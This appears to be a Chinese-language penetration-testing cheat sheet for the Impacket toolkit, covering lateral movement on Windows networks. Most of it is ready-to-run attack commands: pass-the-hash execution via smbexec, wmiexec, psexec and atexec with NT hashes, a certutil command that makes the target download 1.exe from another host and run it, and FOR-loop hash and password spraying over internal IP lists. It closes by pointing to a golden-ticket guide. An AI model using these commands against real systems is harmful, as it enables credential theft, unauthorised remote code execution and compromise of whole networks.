impacket下载地址
smbexec
./smbexec.py test/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678 #左面是lm-hash,右边是nt-hash,lmhash可以为空
./smbexec.py -hashes :3dbde697d71690a769204beb12283678 test/[email protected]
./smbexec.py test/administrator:[email protected]
wmiexec
./wmiexec.py -hashes :7ce21f17c0aee7fb9ceba532d0546ad6 test/[email protected]
psexec
./psexec.py -hashes :7ce21f17c0aee7fb9ceba532d0546ad6 test/[email protected]
./psexec.py -hashes :7ce21f17c0aee7fb9ceba532d0546ad6 test/[email protected] -c /root/1.exe
文件下载与远程命令执行
./atexec.py test/administrator:[email protected] “certutil -urlcache -split -f http://192.168.124.136/1.exe 2.exe”
./atexec.py -hashes :7ce21f17c0aee7fb9ceba532d0546ad6 test/[email protected] 1.exe
hash喷洒攻击
内网机器遍历做hash传递验证,ips.txt内容为内网ip,每段一条
FOR /F %i in (ips.txt) do atexec.exe -hashes :3dbde697d71690a769204beb12283678 ./[email protected]%i whoami
指定主机ntlm hash遍历验证,hashes.txt为已知ntlm hash内容,每段一条
FOR /F %i in (hashes.txt) do atexec.exe -hashes %i ./[email protected] whoami文件内部的hash格式应该为":nthash"或者"lmhash:nthash",如果只采用nthash切记加一个冒号":"
内网机器遍历做密码验证,passwords.txt为已知密码内容,每段一条
FOR /F %i in (passwords.txt) do atexec.exe ./administrator:%[email protected] whoami
指定主机密码遍历验证,ips.txt内容为内网ip,每段一条
FOR /F %i in (ips.txt) do atexec.exe ./administrator:[email protected]%i whoami
制作黄金票据
请参看我的黄金票据的制作与使用这篇博客。